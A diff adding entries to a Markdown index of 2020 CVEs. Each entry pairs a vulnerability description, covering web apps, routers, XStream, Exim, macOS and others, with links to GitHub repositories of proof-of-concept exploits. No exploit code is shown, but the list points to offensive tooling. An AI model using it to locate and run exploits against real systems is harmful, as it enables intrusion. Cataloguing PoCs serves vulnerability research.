+A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
+
+
+- [5l1v3r1/CVE-2020-21224](https://github.com/5l1v3r1/CVE-2020-21224)
+
+### CVE-2020-21378 (2020-12-21)
+
+SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php.
+
+
+- [sukusec301/SeaCMS-v10.1](https://github.com/sukusec301/SeaCMS-v10.1)
+
+### CVE-2020-23160 (2021-01-22)
+
+Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to arbitrary commands as root on the devices.
+
+
+- [Outpost24/Pyrescom-Termod-PoC](https://github.com/Outpost24/Pyrescom-Termod-PoC)
+
+### CVE-2020-23342 (2021-01-19)
+
+A CSRF vulnerability exists in Anchor CMS 0.12.7 anchor/views/users/edit.php that can change the Delete admin users.
+
+
+- [DXY0411/CVE-2020-23342](https://github.com/DXY0411/CVE-2020-23342)
+
### CVE-2020-23489 (2020-11-16)
The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin.
@@ -8648,6 +26535,13 @@
- [huzaifahussain98/CVE-2020-23593](https://github.com/huzaifahussain98/CVE-2020-23593)
+### CVE-2020-23839 (2020-09-01)
+
+A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.
+
+
+- [boku7/CVE-2020-23839](https://github.com/boku7/CVE-2020-23839)
+
### CVE-2020-23934 (2020-08-18)
An issue was discovered in RiteCMS 2.2.1. An authenticated user can directly execute system commands by uploading a php web shell in the "Filemanager" section.
@@ -8668,6 +26562,7 @@
- [underprotection/CVE-2020-24028](https://github.com/underprotection/CVE-2020-24028)
+- [redteambrasil/CVE-2020-24028](https://github.com/redteambrasil/CVE-2020-24028)
### CVE-2020-24029 (2020-09-02)
@@ -8675,6 +26570,7 @@
- [underprotection/CVE-2020-24029](https://github.com/underprotection/CVE-2020-24029)
+- [redteambrasil/CVE-2020-24029](https://github.com/redteambrasil/CVE-2020-24029)
### CVE-2020-24030 (2020-09-02)
@@ -8682,6 +26578,14 @@
- [underprotection/CVE-2020-24030](https://github.com/underprotection/CVE-2020-24030)
+- [redteambrasil/CVE-2020-24030](https://github.com/redteambrasil/CVE-2020-24030)
+
+### CVE-2020-24032 (2020-08-18)
+
+tz.pl on XoruX LPAR2RRD and STOR2RRD 2.70 virtual appliances allows cmd=set&tz=OS command injection via shell metacharacters in a timezone.
+
+
+- [jet-pentest/CVE-2020-24032](https://github.com/jet-pentest/CVE-2020-24032)
### CVE-2020-24033 (2020-10-22)
@@ -8704,11 +26608,21 @@
- [rjt-gupta/CVE-2020-24089](https://github.com/rjt-gupta/CVE-2020-24089)
+### CVE-2020-24148 (2021-07-07)
+
+Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
+
+
+- [dwisiswant0/CVE-2020-24148](https://github.com/dwisiswant0/CVE-2020-24148)
+
### CVE-2020-24186 (2020-08-24)
A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.
+- [hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE](https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE)
+- [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186)
+- [Sakura-501/CVE-2020-24186-exploit](https://github.com/Sakura-501/CVE-2020-24186-exploit)
- [substing/CVE-2020-24186_reverse_shell_upload](https://github.com/substing/CVE-2020-24186_reverse_shell_upload)
### CVE-2020-24227 (2020-11-23)
@@ -8732,6 +26646,7 @@
- [lb0x/cve-2020-24572](https://github.com/lb0x/cve-2020-24572)
+- [gerbsec/CVE-2020-24572-POC](https://github.com/gerbsec/CVE-2020-24572-POC)
### CVE-2020-24597
- [HoangKien1020/CVE-2020-24597](https://github.com/HoangKien1020/CVE-2020-24597)
@@ -8743,6 +26658,13 @@
- [0xkami/cve-2020-24616-poc](https://github.com/0xkami/cve-2020-24616-poc)
+### CVE-2020-24656 (2020-08-26)
+
+Maltego before 4.2.12 allows XXE attacks.
+
+
+- [terzinodipaese/Internet-Security-Project](https://github.com/terzinodipaese/Internet-Security-Project)
+
### CVE-2020-24750 (2020-09-17)
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
@@ -8771,6 +26693,13 @@
- [agarma/CVE-2020-24913-PoC](https://github.com/agarma/CVE-2020-24913-PoC)
+### CVE-2020-24949 (2020-09-03)
+
+Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+
+
+- [r90tpass/CVE-2020-24949](https://github.com/r90tpass/CVE-2020-24949)
+
### CVE-2020-24955 (2020-09-01)
SUPERAntiSyware Professional X Trial 10.0.1206 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the system32 folder via an NTFS directory junction, as demonstrated by a crafted ualapi.dll file that is detected as malware.
@@ -8785,6 +26714,22 @@
- [bryanroma/CVE-2020-25068](https://github.com/bryanroma/CVE-2020-25068)
+### CVE-2020-25078 (2020-09-02)
+
+An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
+
+
+- [MzzdToT/CVE-2020-25078](https://github.com/MzzdToT/CVE-2020-25078)
+- [S0por/CVE-2020-25078](https://github.com/S0por/CVE-2020-25078)
+- [chinaYozz/CVE-2020-25078](https://github.com/chinaYozz/CVE-2020-25078)
+
+### CVE-2020-25134 (2020-09-25)
+
+An issue was discovered in Observium Professional, Enterprise & Community 20.8.10631. It is vulnerable to directory traversal and local file inclusion due to the fact that there is an unrestricted possibility of loading any file with an inc.php extension. Inclusion of other files (even though limited to the mentioned extension) can lead to Remote Code Execution. This can occur via /settings/?format=../ URIs to pages/settings.inc.php.
+
+
+- [ynsmroztas/CVE-2020-25134](https://github.com/ynsmroztas/CVE-2020-25134)
+
### CVE-2020-25200 (2020-10-01)
Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely. Note: This has been disputed by the vendor as not a vulnerability. They argue that this is an intended design
@@ -8799,11 +26744,22 @@
- [mansoorr123/wp-file-manager-CVE-2020-25213](https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213)
- [kakamband/WPKiller](https://github.com/kakamband/WPKiller)
+- [forse01/CVE-2020-25213-Wordpress](https://github.com/forse01/CVE-2020-25213-Wordpress)
+- [0000000O0Oo/Wordpress-CVE-2020-25213](https://github.com/0000000O0Oo/Wordpress-CVE-2020-25213)
+- [piruprohacking/CVE-2020-25213](https://github.com/piruprohacking/CVE-2020-25213)
- [b1ackros337/CVE-2020-25213](https://github.com/b1ackros337/CVE-2020-25213)
- [BLY-Coder/Python-exploit-CVE-2020-25213](https://github.com/BLY-Coder/Python-exploit-CVE-2020-25213)
- [E1tex/Python-CVE-2020-25213](https://github.com/E1tex/Python-CVE-2020-25213)
- [Nguyen-id/CVE-2020-25213](https://github.com/Nguyen-id/CVE-2020-25213)
+### CVE-2020-25223 (2020-09-25)
+
+A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
+
+
+- [darrenmartyn/sophucked](https://github.com/darrenmartyn/sophucked)
+- [twentybel0w/CVE-2020-25223](https://github.com/twentybel0w/CVE-2020-25223)
+
### CVE-2020-25265 (2020-12-02)
AppImage libappimage before 1.0.3 allows attackers to trigger an overwrite of a system-installed .desktop file by providing a .desktop file that contains Name= with path components.
@@ -8866,6 +26822,13 @@
### CVE-2020-25488
- [Ko-kn3t/CVE-2020-25488](https://github.com/Ko-kn3t/CVE-2020-25488)
+### CVE-2020-25498 (2021-01-06)
+
+Cross Site Scripting (XSS) vulnerability in Beetel router 777VR1 can be exploited via the NTP server name in System Time and "Keyword" in URL Filter.
+
+
+- [the-girl-who-lived/CVE-2020-25498](https://github.com/the-girl-who-lived/CVE-2020-25498)
+
### CVE-2020-25514 (2020-09-22)
Sourcecodester Simple Library Management System 1.0 is affected by Incorrect Access Control via the Login Panel, http://<site>/lms/admin.php.
@@ -8889,6 +26852,8 @@
- [Schira4396/CVE-2020-25540](https://github.com/Schira4396/CVE-2020-25540)
+- [Rajchowdhury420/ThinkAdmin-CVE-2020-25540](https://github.com/Rajchowdhury420/ThinkAdmin-CVE-2020-25540)
+- [lowkey0808/cve-2020-25540](https://github.com/lowkey0808/cve-2020-25540)
### CVE-2020-25578 (2021-03-26)
@@ -8897,6 +26862,20 @@
- [farazsth98/freebsd-dirent-info-leak-bugs](https://github.com/farazsth98/freebsd-dirent-info-leak-bugs)
+### CVE-2020-25613 (2020-10-06)
+
+An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
+
+
+- [metapox/CVE-2020-25613](https://github.com/metapox/CVE-2020-25613)
+
+### CVE-2020-25627 (2020-12-09)
+
+The moodlenetprofile user profile field required extra sanitizing to prevent a stored XSS risk. This affects versions 3.9 to 3.9.1. Fixed in 3.9.2.
+
+
+- [HoangKien1020/CVE-2020-25627](https://github.com/HoangKien1020/CVE-2020-25627)
+
### CVE-2020-25632 (2021-03-03)
A flaw was found in grub2 in versions prior to 2.06. The rmmod implementation allows the unloading of a module used as a dependency without checking if any other dependent module is still loaded leading to a use-after-free scenario. This could allow arbitrary code to be executed or a bypass of Secure Boot protections. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
@@ -8918,6 +26897,13 @@
- [hshivhare67/Kernel_4.1.15_CVE-2020-25668](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2020-25668)
+### CVE-2020-25686 (2021-01-20)
+
+A flaw was found in dnsmasq before version 2.83. When receiving a query, dnsmasq does not check for an existing pending request for the same name and forwards a new request. By default, a maximum of 150 pending queries can be sent to upstream servers, so there can be at most 150 queries for the same name. This flaw allows an off-path attacker on the network to substantially reduce the number of attempts that it would have to perform to forge a reply and have it accepted by dnsmasq. This issue is mentioned in the "Birthday Attacks" section of RFC5452. If chained with CVE-2020-25684, the attack complexity of a successful attack is reduced. The highest threat from this vulnerability is to data integrity.
+
+
+- [knqyf263/dnspooq](https://github.com/knqyf263/dnspooq)
+
### CVE-2020-25705 (2020-11-17)
A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization are indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version
@@ -8950,6 +26936,13 @@
### CVE-2020-25769
- [defrancescojp/CVE-2020-25769](https://github.com/defrancescojp/CVE-2020-25769)
+### CVE-2020-25782 (2021-01-28)
+
+An issue was discovered on Accfly Wireless Security IR Camera 720P System with software versions v3.10.73 through v4.15.77. There is an unauthenticated stack-based buffer overflow in the function CNetClientManage::ServerIP_Proto_Set during incoming message handling.
+
+
+- [tezeb/accfly](https://github.com/tezeb/accfly)
+
### CVE-2020-25790 (2020-09-19)
Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2
@@ -8984,6 +26977,7 @@
- [novysodope/CVE-2020-26217-XStream-RCE-POC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC)
+- [Al1ex/CVE-2020-26217](https://github.com/Al1ex/CVE-2020-26217)
- [epicosy/XStream-1](https://github.com/epicosy/XStream-1)
### CVE-2020-26233 (2020-12-08)
@@ -8991,14 +26985,23 @@
Git Credential Manager Core (GCM Core) is a secure Git credential helper built on .NET Core that runs on Windows and macOS. In Git Credential Manager Core before version 2.0.289, when recursively cloning a Git repository on Windows with submodules, Git will first clone the top-level repository and then recursively clone all submodules by starting new Git processes from the top-level working directory. If a malicious git.exe executable is present in the top-level repository then this binary will be started by Git Credential Manager Core when attempting to read configuration, and not git.exe as found on the %PATH%. This only affects GCM Core on Windows, not macOS or Linux-based distributions. GCM Core version 2.0.289 contains the fix for this vulnerability, and is available from the project's GitHub releases page. GCM Core 2.0.289 is also bundled in the latest Git for Windows release; version 2.29.2(3). As a workaround, users should avoid recursively cloning untrusted repositories with the --recurse-submodules option.
+- [whr819987540/test_CVE-2020-26233](https://github.com/whr819987540/test_CVE-2020-26233)
- [an1p3lg5/CVE-2020-26233](https://github.com/an1p3lg5/CVE-2020-26233)
+### CVE-2020-26258 (2020-12-16)
+
+XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.
+
+
+- [Al1ex/CVE-2020-26258](https://github.com/Al1ex/CVE-2020-26258)
+
### CVE-2020-26259 (2020-12-16)
XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.
- [jas502n/CVE-2020-26259](https://github.com/jas502n/CVE-2020-26259)
+- [Al1ex/CVE-2020-26259](https://github.com/Al1ex/CVE-2020-26259)
### CVE-2020-26413 (2020-12-11)
@@ -9072,6 +27075,8 @@
In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.
+- [motikan2010/CVE-2020-27223](https://github.com/motikan2010/CVE-2020-27223)
+- [ttestoo/Jetty-CVE-2020-27223](https://github.com/ttestoo/Jetty-CVE-2020-27223)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223)
@@ -9082,6 +27087,13 @@
- [OccultSlolem/GatorMed](https://github.com/OccultSlolem/GatorMed)
+### CVE-2020-27301 (2021-06-04)
+
+A stack buffer overflow in Realtek RTL8710 (and other Ameba-based devices) can lead to remote code execution via the "AES_UnWRAP" function, when an attacker in Wi-Fi range sends a crafted "Encrypted GTK" value as part of the WPA2 4-way-handshake.
+
+
+- [chertoGUN/CVE-2020-27301-hostapd](https://github.com/chertoGUN/CVE-2020-27301-hostapd)
+
### CVE-2020-27358 (2020-10-31)
An issue was discovered in REDCap 8.11.6 through 9.x before 10. The messenger's CSV feature (that allows users to export their conversation threads as CSV) allows non-privileged users to export one another's conversation threads by changing the thread_id parameter in the request to the endpoint Messenger/messenger_download_csv.php?title=Hey&thread_id={THREAD_ID}.
@@ -9134,6 +27146,13 @@
- [Trinadh465/linux-4.19.72_CVE-2020-27815](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27815)
+### CVE-2020-27824 (2021-05-13)
+
+A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.
+
+
+- [pazhanivel07/openjpeg-2.3.0_CVE-2020-27824](https://github.com/pazhanivel07/openjpeg-2.3.0_CVE-2020-27824)
+
### CVE-2020-27838 (2021-03-08)
A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
@@ -9141,6 +27160,20 @@
- [Cappricio-Securities/CVE-2020-27838](https://github.com/Cappricio-Securities/CVE-2020-27838)
+### CVE-2020-27904 (2020-12-08)
+
+A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. An application may be able to execute arbitrary code with kernel privileges.
+
+
+- [pattern-f/xattr-oob-swap](https://github.com/pattern-f/xattr-oob-swap)
+
+### CVE-2020-27930 (2020-12-08)
+
+A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. Processing a maliciously crafted font may lead to arbitrary code execution.
+
+
+- [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://github.com/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930)
+
### CVE-2020-27935 (2021-04-02)
Multiple issues were addressed with improved logic. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Big Sur 11.0.1, watchOS 7.1, tvOS 14.2. A sandboxed process may be able to circumvent sandbox restrictions.
@@ -9173,6 +27206,16 @@
- [r00t4dm/CVE-2020-27955](https://github.com/r00t4dm/CVE-2020-27955)
- [shubham0d/CVE-2020-27955](https://github.com/shubham0d/CVE-2020-27955)
- [TheTh1nk3r/cve-2020-27955](https://github.com/TheTh1nk3r/cve-2020-27955)
+- [NeoDarwin/CVE-2020-27955](https://github.com/NeoDarwin/CVE-2020-27955)
+- [DeeLMind/CVE-2020-27955-LFS](https://github.com/DeeLMind/CVE-2020-27955-LFS)
+- [HK69s/CVE-2020-27955](https://github.com/HK69s/CVE-2020-27955)
+- [IanSmith123/CVE-2020-27955](https://github.com/IanSmith123/CVE-2020-27955)
+- [Arnoldqqq/CVE-2020-27955](https://github.com/Arnoldqqq/CVE-2020-27955)
+- [nob0dy-3389/CVE-2020-27955](https://github.com/nob0dy-3389/CVE-2020-27955)
+- [Marsable/CVE-2020-27955-LFS](https://github.com/Marsable/CVE-2020-27955-LFS)
+- [FrostsaberX/CVE-2020-27955](https://github.com/FrostsaberX/CVE-2020-27955)
+- [whitetea2424/CVE-2020-27955-LFS-main](https://github.com/whitetea2424/CVE-2020-27955-LFS-main)
+- [userxfan/cve-2020-27955](https://github.com/userxfan/cve-2020-27955)
- [z50913/CVE-2020-27955](https://github.com/z50913/CVE-2020-27955)
- [Kimorea/CVE-2020-27955-LFS](https://github.com/Kimorea/CVE-2020-27955-LFS)
@@ -9183,12 +27226,28 @@
- [k0rnh0li0/CVE-2020-27976](https://github.com/k0rnh0li0/CVE-2020-27976)
+### CVE-2020-28018 (2021-05-06)
+
+Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.
+
+
+- [dorkerdevil/CVE-2020-28018](https://github.com/dorkerdevil/CVE-2020-28018)
+- [zr0tt/CVE-2020-28018](https://github.com/zr0tt/CVE-2020-28018)
+
+### CVE-2020-28032 (2020-10-31)
+
+WordPress before 5.5.2 mishandles deserialization requests in wp-includes/Requests/Utility/FilteredIterator.php.
+
+
+- [nth347/CVE-2020-28032_PoC](https://github.com/nth347/CVE-2020-28032_PoC)
+
### CVE-2020-28052 (2020-12-18)
An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.
- [madstap/bouncy-castle-generative-test-poc](https://github.com/madstap/bouncy-castle-generative-test-poc)
+- [kurenaif/CVE-2020-28052_PoC](https://github.com/kurenaif/CVE-2020-28052_PoC)
### CVE-2020-28054 (2020-11-19)
@@ -9197,6 +27256,9 @@
- [VoidSec/Tivoli-Madness](https://github.com/VoidSec/Tivoli-Madness)
+### CVE-2020-28148
+- [fengchenzxc/CVE-2020-28148](https://github.com/fengchenzxc/CVE-2020-28148)
+
### CVE-2020-28169 (2020-12-24)
The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.
@@ -9246,6 +27308,17 @@
- [NetJBS/CVE-2020-28478--PoC](https://github.com/NetJBS/CVE-2020-28478--PoC)
+### CVE-2020-28488
+- [rafaelcintralopes/CVE-2020-28488](https://github.com/rafaelcintralopes/CVE-2020-28488)
+
+### CVE-2020-28502 (2021-03-05)
+
+This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
+
+
+- [s-index/CVE-2020-28502](https://github.com/s-index/CVE-2020-28502)
+- [dpredrag/CVE-2020-28502](https://github.com/dpredrag/CVE-2020-28502)
+
### CVE-2020-28647 (2020-11-17)
In Progress MOVEit Transfer before 2020.1, a malicious user could craft and store a payload within the application. If a victim within the MOVEit Transfer instance interacts with the stored payload, it could invoke and execute arbitrary code within the context of the victim's browser (XSS).
@@ -9253,12 +27326,36 @@
- [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://github.com/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647)
+### CVE-2020-28653 (2021-02-03)
+
+Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
+
+
+- [tuo4n8/CVE-2020-28653](https://github.com/tuo4n8/CVE-2020-28653)
+- [intrigueio/cve-2020-28653-poc](https://github.com/intrigueio/cve-2020-28653-poc)
+- [mr-r3bot/ManageEngine-CVE-2020-28653](https://github.com/mr-r3bot/ManageEngine-CVE-2020-28653)
+
+### CVE-2020-28874 (2021-01-21)
+
+reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter).
+
+
+- [varandinawer/CVE-2020-28874](https://github.com/varandinawer/CVE-2020-28874)
+
+### CVE-2020-28926 (2020-11-30)
+
+ReadyMedia (aka MiniDLNA) before versions 1.3.0 allows remote code execution. Sending a malicious UPnP HTTP request to the miniDLNA service using HTTP chunked encoding can lead to a signedness bug resulting in a buffer overflow in calls to memcpy/memmove.
+
+
+- [lorsanta/exploit-CVE-2020-28926](https://github.com/lorsanta/exploit-CVE-2020-28926)
+
### CVE-2020-28948 (2020-11-19)
Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked.
- [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://github.com/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949)
+- [nopdata/cve-2020-28948](https://github.com/nopdata/cve-2020-28948)
- [JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949](https://github.com/JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949)
### CVE-2020-29007 (2023-04-15)
@@ -9310,11 +27407,26 @@
- [nanopathi/linux-4.19.72_CVE-2020-29370](https://github.com/nanopathi/linux-4.19.72_CVE-2020-29370)
+### CVE-2020-29583 (2020-12-22)
+
+Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges.
+
+
+- [ruppde/scan_CVE-2020-29583](https://github.com/ruppde/scan_CVE-2020-29583)
+
+### CVE-2020-29599 (2020-12-07)
+
+ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.
+
+
+- [coco0x0a/CVE-2020-29599](https://github.com/coco0x0a/CVE-2020-29599)
+
### CVE-2020-29607 (2020-12-16)
A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution.
+- [0xAbbarhSF/CVE-2020-29607](https://github.com/0xAbbarhSF/CVE-2020-29607)
- [0xN7y/CVE-2020-29607](https://github.com/0xN7y/CVE-2020-29607)
### CVE-2020-29666 (2020-12-10)
@@ -9338,11 +27450,26 @@
- [code-byter/CVE-2020-29669](https://github.com/code-byter/CVE-2020-29669)
+### CVE-2020-35191 (2020-12-17)
+
+The official drupal docker images before 8.5.10-fpm-alpine (Alpine specific) contain a blank password for a root user. System using the drupal docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.
+
+
+- [megadimenex/MegaHiDocker](https://github.com/megadimenex/MegaHiDocker)
+
+### CVE-2020-35262 (2021-01-06)
+
+Cross Site Scripting (XSS) vulnerability in Digisol DG-HR3400 can be exploited via the NTP server name in Time and date module and "Keyword" in URL Filter.
+
+
+- [the-girl-who-lived/CVE-2020-35262](https://github.com/the-girl-who-lived/CVE-2020-35262)
+
### CVE-2020-35314 (2021-04-20)
A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.
+- [ybdegit2020/wonderplugin](https://github.com/ybdegit2020/wonderplugin)
- [AkashLingayat/WonderCMS-CVE-2020-35314](https://github.com/AkashLingayat/WonderCMS-CVE-2020-35314)
### CVE-2020-35391 (2021-01-01)
@@ -9366,6 +27493,7 @@
- [GuillaumePetit84/CVE-2020-35488](https://github.com/GuillaumePetit84/CVE-2020-35488)
+- [githubfoam/nxlog-ubuntu-githubactions](https://github.com/githubfoam/nxlog-ubuntu-githubactions)
### CVE-2020-35489 (2020-12-17)
@@ -9373,9 +27501,24 @@
- [dn9uy3n/Check-WP-CVE-2020-35489](https://github.com/dn9uy3n/Check-WP-CVE-2020-35489)
+- [X0UCYB3R/Check-WP-CVE-2020-35489](https://github.com/X0UCYB3R/Check-WP-CVE-2020-35489)
- [reneoliveirajr/wp_CVE-2020-35489_checker](https://github.com/reneoliveirajr/wp_CVE-2020-35489_checker)
- [Cappricio-Securities/CVE-2020-35489](https://github.com/Cappricio-Securities/CVE-2020-35489)
+### CVE-2020-35498 (2021-02-11)
+
+A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability.
+
+
+- [freddierice/cve-2020-35498-flag](https://github.com/freddierice/cve-2020-35498-flag)
+
+### CVE-2020-35545 (2020-12-17)
+
+Time-based SQL injection exists in Spotweb 1.4.9 via the query string.
+
+
+- [bousalman/CVE-2020-35545](https://github.com/bousalman/CVE-2020-35545)
+
### CVE-2020-35590 (2020-12-21)
LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.
@@ -9397,6 +27540,27 @@
- [n0npax/CVE-2020-35669](https://github.com/n0npax/CVE-2020-35669)
+### CVE-2020-35682 (2021-03-13)
+
+Zoho ManageEngine ServiceDesk Plus before 11134 allows an Authentication Bypass (only during SAML login).
+
+
+- [its-arun/CVE-2020-35682](https://github.com/its-arun/CVE-2020-35682)
+
+### CVE-2020-35713 (2020-12-26)
+
+Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
+
+
+- [Al1ex/CVE-2020-35713](https://github.com/Al1ex/CVE-2020-35713)
+
+### CVE-2020-35717 (2021-01-01)
+
+zonote through 0.4.0 allows XSS via a crafted note, with resultant Remote Code Execution (because nodeIntegration in webPreferences is true).
+
+
+- [hmartos/cve-2020-35717](https://github.com/hmartos/cve-2020-35717)
+
### CVE-2020-35728 (2020-12-27)
